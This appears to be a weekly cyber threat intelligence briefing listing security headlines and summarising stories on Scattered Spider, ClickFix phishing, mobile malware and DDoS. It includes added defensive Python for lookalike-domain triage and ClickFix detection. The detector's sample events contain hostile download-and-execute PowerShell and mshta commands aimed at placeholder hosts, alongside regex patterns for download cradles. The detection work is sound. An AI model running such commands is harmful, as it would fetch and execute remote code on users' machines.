Researcher shows how Android notifications can be a phisher's gold mine
Virtual kidnapping scams prey on our worst fears - Help Net Security
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Fraud, Scams and Financial Crime
Brits Lose £106m to Romance Fraud in a Year - Infosecurity Magazine
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
US recovers $225 million of crypto stolen in investment scams
Scammers hijack real support pages to show fake phone numbers | TechSpot
Paddle settles for $5 million over facilitating tech support scams
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Artificial Intelligence
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Employees are using AI where they know they shouldn’t - Help Net Security
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyberwarfare
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Why CISOs need to understand the AI tech stack - Help Net Security
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
Before scaling GenAI, map your LLM usage and risk zones - Help Net Security
LLM agents flunk CRM and confidentiality tasks • The Register
Stop Anthropomorphizing AI and Secure It Like Software
How CISOs Can Govern AI & Meet Evolving Regulations
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Malware attack disguises itself as DeepSeek installer • Graham Cluley
2FA/MFA
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Why SMS two-factor authentication codes aren't safe and what to use instead | ZDNET
Malware
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Malware attack disguises itself as DeepSeek installer • Graham Cluley
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
Threat Actors Target Victims with HijackLoader and DeerStealer - Infosecurity Magazine
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Threat Actors Attacking Windows System With New Winos 4.0 Malware
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Banana Squad’s Stealthy GitHub Malware Campaign Targets Devs - Infosecurity Magazine
New Campaigns Distribute Malware via Open Source Hacking Tools - SecurityWeek
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
Malicious Chimera Turns Larcenous on Python Index
Security Bite: Infostealer malware spikes 28% among Mac users, says Jamf - 9to5Mac
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Bots/Botnets
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
Mobile
Researcher shows how Android notifications can be a phisher's gold mine
Godfather Android malware now uses virtualization to hijack banking apps
New Android Malware Surge Hits Devices via Overlays, Virtualization Fraud and NFC Theft
Denial of Service/DoS/DDoS
Protecting Against Origin Server DDoS Attacks - Security Boulevard
Internet of Things – IoT
Thieves don't need your car keys, just a wireless signal - Help Net Security
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Data Breaches/Leaks
The 20 biggest data breaches of the 21st century | CSO Online
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
GCHQ intern who took secret data home jailed - BBC News
FCA warned four staffers who pocketed regulator data • The Register
UK fines 23andMe for ‘profoundly damaging’ breach exposing genetics data
Cartier Data Breach: Luxury Retailer Warns Customers That Personal Data Was Exposed - SecurityWeek
Telecom giant Viasat breached by China's Salt Typhoon hackers
No, the 16 billion credentials leak is not a new data breach
Hackers Access Legacy Systems in Oxford City Council Cyber Attack - SecurityWeek
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Freedman HealthCare targeted by cyber extortionists • The Register
CCC breach exposes 9M Americans, hackers claim | Cybernews
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Paraguay Suffered Data Breach: 7.4 Million Citizen Records Leaked on Dark Web
Zoomcar discloses security breach impacting 8.4 million users
240,000 Impacted by Data Breach at Eyecare Tech Firm Ocuco - SecurityWeek
Data Breach at Healthcare Services Firm Episource Impacts 5.4 Million People - SecurityWeek
Hacker steals 1 million Cock.li user records in webmail data breach
Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defence Documents
Organised Crime & Criminal Actors
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify users as young as 11-year-old on Cracked.io hacking forum
Dutch police identify 126 Cracked.io users | Cybernews
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
Insurance
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Supply Chain and Third Parties
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Security Is Only as Strong as the Weakest Third-Party Link
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Cloud/SaaS
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Threat Actor Abuses TeamFiltration for Entra ID Attacks
Google links massive cloud outage to API management issue
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Outages
Google links massive cloud outage to API management issue
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Encryption
Encryption Backdoors: The Security Practitioners’ View - SecurityWeek
Linux and Open Source
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Passwords, Credential Stuffing & Brute Force Attacks
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Social Media
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
Trump administration set to again waive TikTok ban • The Register
Meta Starts Showing Ads on WhatsApp After 6-Year Delay From 2018 Announcement
Regulations, Fines and Legislation
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
How CISOs Can Govern AI & Meet Evolving Regulations
Cyber security takes a big hit in new Trump executive order - Ars Technica
Trump administration set to again waive TikTok ban • The Register
SEC withdraws cyber rules for investment companies, advisers | CyberScoop
The Future of the SEC’s Cyber Security Disclosure Rules | DLA Piper - JDSupra
Careers, Working in Cyber and Information Security
Employers are demanding too much from junior cyber recruits • The Register
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
ISC2 Report: Entry-Level Hiring Needs a Reset
The Triple Threat of Burnout: Overworked, Unsatisfied, Trapped
Building a Career as a Cyber Warfare Defender - DataBreachToday
Cyber Security Company Launches In-House 'University' Training Program
Law Enforcement Action and Take Downs
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify 126 Cracked.io users | Cybernews
GCHQ intern who took secret data home jailed - BBC News
Ransomware gang busted in Thailand hotel raid
Ryuk ransomware’s initial access expert extradited to the US
Law enforcement operation shut down dark web drug marketplace Archetyp Market
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyber Warfare
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber weapons in the Israel-Iran conflict may hit the US • The Register
Cyber attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
Nation State Actors
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
How China Is Using Hackathons, Competitions to Build an Army of Hackers - Bloomberg
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China Is Hacking Russia to Steal War Secrets - The New York Times
Telecom giant Viasat breached by China's Salt Typhoon hackers
State-sponsored hackers compromised the email accounts of several Washington Post journalists
Russia
Russia has a plan for long-term aggression against Europe - Kallas | УНН
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
China Is Hacking Russia to Steal War Secrets - The New York Times
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Suspected Russian hackers used new tactic against UK researcher | Reuters
Sweden says it is under cyber attack • Graham Cluley
Iran
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber Attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
Companies Warned On Iranian Cyber Attacks - WSJ
Israel-Tied Predatory Sparrow Hackers Are Waging Cyber War on Iran’s Financial System | WIRED
Iran-Israel War Triggers a Maelstrom in Cyber Space
Iran’s internet goes offline amid claims of ‘enemy abuse’ • The Register
Iran's Cyber Army: Missing in Action
Pro-Israel hackers take credit for cyber attack on Iran's Bank Sepah
Cyber attack hits state-owned bank in Iran - Iraqi News
Iran experienced a near-total national internet blackout
Elon Musk turns on Starlink in Iran as Tehran shuts down internet | The Jerusalem Post
North Korea
North Korean hackers deepfake execs in Zoom call to spread Mac malware
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Tools and Controls
Security Is Only as Strong as the Weakest Third-Party Link
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
Cyber Security Strategy Shifts Amid Global Political Tensions
What is a compliance audit? (with an example checklist) | TechTarget
CISOs brace for a surge in domain-based cyber threats - Help Net Security
SAML vs. OAuth 2.0: Mastering the Key Differences - Security Boulevard
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
Why a Layered Approach Is Essential for Cyber Security and Zero Trust - Security Boulevard
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Application security risk: How leaders can protect their businesses | IT Pro
Stop Anthropomorphizing AI and Secure It Like Software
The new attack surface: from space to smartphone - SpaceNews
Other News
‘We’re being attacked all the time’: how UK banks stop hackers | Banking | The Guardian
Why Legal Firms Are Vulnerable to Cyber Threats and How to Prevent the Risks | LawNews.co.uk
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Bank of England loses hundreds of laptops amid rising cyber threat
WestJet: 'expect interruptions' online amid security snafu • The Register
This Is One of the Worst Things You Can Do at the Airport, According to Cyber Security Experts
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
Cyber Attacks on Humanitarian Orgs Jump Worldwide
Survey of UK retailers shows lack of preparedness for cyber attacks | Logistics Matters
Vulnerability Management
Vulnerabilities
Veeam Patches CVE-2025-23121: Critical RCE Bug Rated 9.9 CVSS in Backup & Replication
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
Critical Vulnerability Patched in Citrix NetScaler - SecurityWeek
High-Severity Vulnerabilities Patched by Cisco, Atlassian - SecurityWeek
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Critical Vulnerability Exposes Many Mitel MiCollab Instances to Remote Hacking - SecurityWeek
Apple squashes zero-click bug used for spyware attacks • The Register
Palo Alto Networks fixed multiple privilege escalation flaws
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
BeyondTrust warns of pre-auth RCE in Remote Support software
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
AMD releases security update for Ryzen CPUs with TPM vulnerability - Techzine Global
Over 46,000 Grafana instances exposed to account takeover bug
Microsoft: June Windows Server security updates cause DHCP issues
ASUS Armoury Crate bug lets attackers get Windows admin privileges
Attackers actively exploit older TP-Link routers | Cybernews
Organisations Warned of Vulnerability Exploited Against Discontinued TP-Link Routers - SecurityWeek
Zyxel Firewall Vulnerability Again in Attacker Crosshairs - SecurityWeek
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 13 June 2025
-Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
-An Emerging Phishing Technique Exploits Trust in Browser-based Messages
-Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
-Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
-Cyber Resilience Begins Before the Crisis
-How Did Britain’s Food Supplies Become So Vulnerable?
-Europol Says Criminal Demand for Data is “Skyrocketing”
-AI Is a Data-Breach Time Bomb, Reveals New Report
-What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
-Internet Infamy Drives the Com’s Crime Sprees
-China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
-Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
-UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week’s review starts with evolving cyber attack techniques including the targeting of IT and managed service providers to gain access to multiple firms through a single compromise, while other techniques include exploiting end-user trust in messages appearing in browsers, attacks on smartphones, and increasingly complex DDoS attacks. We also reflect on the need for all organisations to proactively plan for a cyber incident, and the need to improve cyber-resilience of food supplies.
Our analysis of specialist and other media highlights the threats that organisations face in protecting their data, with high criminal demand and sensitive data being exposed to insecure and unverified AI tools. We also include information on penetration testing, which is one of the key ways for organisations to identify and address vulnerabilities that can be exploited by attackers.
Finally, we include articles on developments within the attacker community, including groups of teenagers and young adults as well as nation states, and insights into the impact of geo-political developments on cyber security for organisations.
At Black Arrow, we believe organisations achieve the most appropriate security by taking a proactive, cross-functional approach to cyber resilience. This starts with board engagement and threat-informed decision-making, including managing risks that are currently being exploited through third parties such as IT and managed service providers.
Top Cyber Stories of the Last Week
Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
ReliaQuest has reported that the group behind recent cyber attacks on UK retailers, including Marks & Spencer and Harrods, is now using advanced impersonation tactics to breach organisations via their IT providers. Over 80% of associated domains mimic trusted technology vendors, enabling attacks on high-value targets such as CISOs and CFOs. The group combines phishing kits with social engineering to bypass multi-factor authentication and exploit help desks. Its use of ransomware-as-a-service partnerships allows access to powerful attack tools, expanding its reach. Attacks increasingly target managed service providers to access multiple organisations through a single compromise.
https://www.infosecurity-magazine.com/news/scattered-spider-tech-vendor/
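The vendor-impersonation domains described above can be triaged automatically. The following is an added example, not code from the briefing or from ReliaQuest: it takes the registrable label of each observed domain and checks it against a list of trusted vendor brands for homoglyph substitution, typos and transpositions, and brand-plus-keyword composition. The vendor list, the action-word list, the minimal public-suffix table and the sample domains are assumptions for illustration.

```python
"""Vendor lookalike-domain triage.

Added example, not code from the Black Arrow briefing or the ReliaQuest report it
summarises. It flags observed domains whose registrable label imitates a trusted
vendor brand. The vendor list, action words, public-suffix table and sample
domains are illustrative assumptions.
"""
import re
from dataclasses import dataclass

TRUSTED_VENDORS = ("okta", "microsoft", "servicenow", "zscaler", "cisco")  # assumed list
ACTION_WORDS = ("sso", "login", "signin", "support", "helpdesk", "help", "vpn", "mfa", "verify", "portal")
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"}
DIGRAPHS = (("vv", "w"), ("rn", "m"))
PUBLIC_SUFFIXES = ("co.uk", "org.uk", "com.au")  # stand-in for a real Public Suffix List lookup


@dataclass
class Lookalike:
    domain: str
    brand: str
    rule: str  # homoglyph | typo | brand_plus_keyword | brand_embedded


def registrable_label(domain: str) -> str:
    """'sso.okta-support.co.uk' -> 'okta-support'."""
    d = domain.lower().strip(".")
    for suffix in PUBLIC_SUFFIXES:
        if d.endswith("." + suffix):
            d = d[: -len(suffix) - 1]
            break
    else:
        d = d.rsplit(".", 1)[0]
    return d.rsplit(".", 1)[-1]


def fold_homoglyphs(s: str) -> str:
    """Map look-alike digits and digraphs onto the letters they imitate."""
    for pair, letter in DIGRAPHS:
        s = s.replace(pair, letter)
    return "".join(HOMOGLYPHS.get(c, c) for c in s)


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(domain: str):
    """Return a Lookalike for the first brand the domain imitates, else None."""
    label = registrable_label(domain)
    if label in TRUSTED_VENDORS:
        return None  # exact brand label; production code should whitelist full known-good domains instead
    tokens = [t for t in re.split(r"[-_]", label) if t]
    for brand in TRUSTED_VENDORS:
        threshold = 1 if len(brand) < 8 else 2  # tighter for short brands to limit false positives
        for raw in tokens:
            if raw == brand:
                continue
            folded = fold_homoglyphs(raw)
            if folded == brand:
                return Lookalike(domain, brand, "homoglyph")
            if osa_distance(folded, brand) <= threshold:
                return Lookalike(domain, brand, "typo")
        if brand in tokens and any(t in ACTION_WORDS for t in tokens):
            return Lookalike(domain, brand, "brand_plus_keyword")
        if brand in fold_homoglyphs(label):
            return Lookalike(domain, brand, "brand_embedded")  # low confidence, review by hand
    return None


def triage(domains):
    """Classify a batch of observed domains and keep only the hits."""
    return [hit for hit in (classify(d) for d in domains) if hit]


SAMPLE_DOMAINS = [  # constructed for this example
    "okta.com", "login.okta.com", "okta-sso-support.com", "0kta-login.net",
    "mircosoft-helpdesk.co.uk", "servicenovv.com", "ciscoportal.com",
    "sanfrancisco-tours.com", "example-payroll.com",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_DOMAINS):
        print(f"{hit.domain:28} imitates {hit.brand:11} via {hit.rule}")
```

Run it over newly-registered-domain feeds, web-proxy logs or the URLs quoted in helpdesk tickets. The brand_embedded rule is deliberately low confidence: sanfrancisco-tours.com is flagged only because it contains cisco, which is why hits from that rule should be reviewed rather than blocked, and why a real deployment replaces the exact-label check with a list of known-good full domains.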
An Emerging Phishing Technique Exploits Trust in Browser-based Messages
ClickFix is an emerging phishing technique that exploits user trust in browser-based messages to deliver malware, with attacks now observed across EMEA and the US. These campaigns trick users into copying and running PowerShell commands themselves by mimicking familiar prompts, such as fake CAPTCHA checks, browser error pages or job-interview troubleshooting steps. Unlike traditional phishing emails, the lure is delivered entirely in the browser and the victim executes the command outside it, so there is no attachment or downloaded file for email and download-based controls to inspect, which makes detection and prevention more difficult. Threat actors are leveraging ClickFix to install a range of malware, from credential stealers to remote access tools, and the method’s adaptability is increasing its appeal. Organisations are advised to adopt phishing-resistant authentication and identity-focused defences.
https://www.darkreading.com/remote-workforce/cutting-edge-clickfix-snowball-phishing
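Detection logic for the pattern described above, added here as an example and not code from the briefing or the Dark Reading article: it scores process-creation records for an interpreter launched by a user and carrying a download-and-execute command, which is what a pasted ClickFix command looks like in telemetry. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the sample events, the indicator weights, the lure-comment wording and the explorer.exe-parent heuristic (the Run dialog is a child of explorer.exe) are assumptions for illustration.

```python
"""ClickFix-style launch detection over process-creation telemetry.

Added example: not code from the Black Arrow briefing or the article it summarises.
Records use Sysmon Event ID 1 field names; the sample events, indicator weights and
the 'user-launched parent' heuristic are illustrative assumptions.
"""
import base64
import re
from dataclasses import dataclass

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe")
# Parents implying a human typed or pasted the command (Run dialog, terminal), not a service
USER_LAUNCH_PARENTS = ("explorer.exe", "windowsterminal.exe")

# (indicator name, pattern, weight); matched against the raw and the decoded command line
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indow(?:style)?)?\s+h(?:idden)?\b", re.I), 2),
    ("bypass_policy", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I), 1),
    ("encoded_cmd", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), 3),
    # Pasted commands often end in a comment so the Run box shows benign text (assumed lure wording)
    ("captcha_lure", re.compile(r"#.*(?:not a robot|verification|captcha)", re.I), 2),
]


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    event_id: int
    score: int
    indicators: list


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str:
    """Decode a -EncodedCommand payload (base64 over UTF-16LE text), or return ''."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", command_line, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: ProcessEvent):
    """Return (score, indicator names); only user-launched interpreters are scored."""
    if basename(ev.image) not in INTERPRETERS or basename(ev.parent_image) not in USER_LAUNCH_PARENTS:
        return 0, []
    texts = [ev.command_line]
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        texts.append(decoded)  # scan the decoded script too, or -enc hides the cradle
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if any(pattern.search(t) for t in texts):
            hits.append(name)
            score += weight
    return score, hits


def detect_clickfix(events, threshold: int = 3):
    """Return a Finding for every event whose indicator score reaches the threshold."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append(Finding(ev.event_id, score, hits))
    return findings


def encode_powershell(script: str) -> str:
    """Build what `powershell -enc` expects, used here only to construct a sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example
    ProcessEvent(1, r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -ep bypass -c "iex (irm https://captcha-check.example/verify.txt)" '
                 "# I am not a robot - reCAPTCHA Verification ID: 7391"),
    ProcessEvent(2, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://update-check.example/verify.hta"),
    ProcessEvent(3, r"C:\Windows\explorer.exe", PS,
                 "powershell -nop -w hidden -enc " + encode_powershell("iex (iwr 'https://lure.example/p.ps1')")),
    ProcessEvent(4, r"C:\Windows\System32\svchost.exe", PS,  # scheduled task, same flags, not user-launched
                 r"powershell -w hidden -ep bypass -File C:\Scripts\nightly-backup.ps1"),
    ProcessEvent(5, r"C:\Windows\explorer.exe", PS, f'"{PS}"'),  # user opens a console
    ProcessEvent(6, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {f.event_id}: score {f.score} {f.indicators}")
```

The parent check is what keeps the false-positive rate usable: event 4 carries the same hidden-window and bypass flags as a lure but comes from a scheduled task, so it is not scored. In production the same logic runs over EDR process telemetry; the weights and threshold are starting points to tune against your own baseline of legitimate interactive PowerShell use.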
Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
Kaspersky has reported a sharp rise in mobile cyber threats, with malware targeting Android users increasing by 27% in early 2025 compared to the previous quarter. Over 12 million users were affected, with banking trojans and data-stealing malware identified as the primary threats. Some infections were traced to preinstalled malware on new phones, highlighting supply chain risks. Notably active malware families included those capable of stealing credentials, intercepting messages and tampering with cryptocurrency transactions. The report warns that mobile devices are not inherently safer than desktops, and users should treat app downloads and device permissions with far greater caution.
Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
FS-ISAC and Akamai have reported a sharp rise in both the volume and complexity of Distributed Denial of Service (DDoS) attacks targeting the financial sector. In October 2024 alone, nearly 350 separate DDoS events were recorded, with some comprising billions of malicious requests. The report highlights a 23% increase in application-layer attacks over the past year, affecting login portals and APIs. What was once seen as a nuisance is now considered a strategic threat, with attackers using adaptive, multi-vector techniques to bypass defences. This surge is fuelled by escalating geopolitical tensions, with hacktivist groups exploiting global events to launch targeted disruption campaigns.
https://www.infosecurity-magazine.com/news/ddos-financial-sector-surge/
Cyber Resilience Begins Before the Crisis
Microsoft’s Deputy CISO highlights the critical need for proactive planning and clear communication in cyber incident response. Many firms treat cyber attacks as isolated IT issues, yet the impact extends across legal, HR, communications and executive leadership. Two common misconceptions, assuming incidents are minor and viewing them as purely technical, undermine resilience. Effective preparation includes tested playbooks, decision frameworks, backup communications, and rehearsed messaging strategies. AI is emerging as a valuable support tool, enhancing detection and response coordination. Ultimately, cyber resilience is a leadership issue requiring cross-functional accountability, continuous refinement, and executive engagement.
https://www.microsoft.com/en-us/security/blog/2025/06/12/cyber-resilience-begins-before-the-crisis/
How Did Britain’s Food Supplies Become So Vulnerable?
A ransomware attack on chilled food distributor Peter Green Chilled left over £100,000 worth of meat products stranded, highlighting vulnerabilities in the UK's cold chain logistics. With around 50 per cent of all UK food moving through this network, any disruption can rapidly impact supermarket shelves. Industry experts warn that cyber attacks on supply chain providers are growing in sophistication, with attackers targeting warehouse systems and vehicle tracking to halt distribution. Despite the sector’s critical role in food and pharmaceutical delivery, it currently lacks formal Critical National Infrastructure recognition, limiting coordinated incident response planning at a national level.
https://www.telegraph.co.uk/news/2025/06/05/how-did-britains-food-supplies-become-so-vulnerable/
Europol Says Criminal Demand for Data is “Skyrocketing”
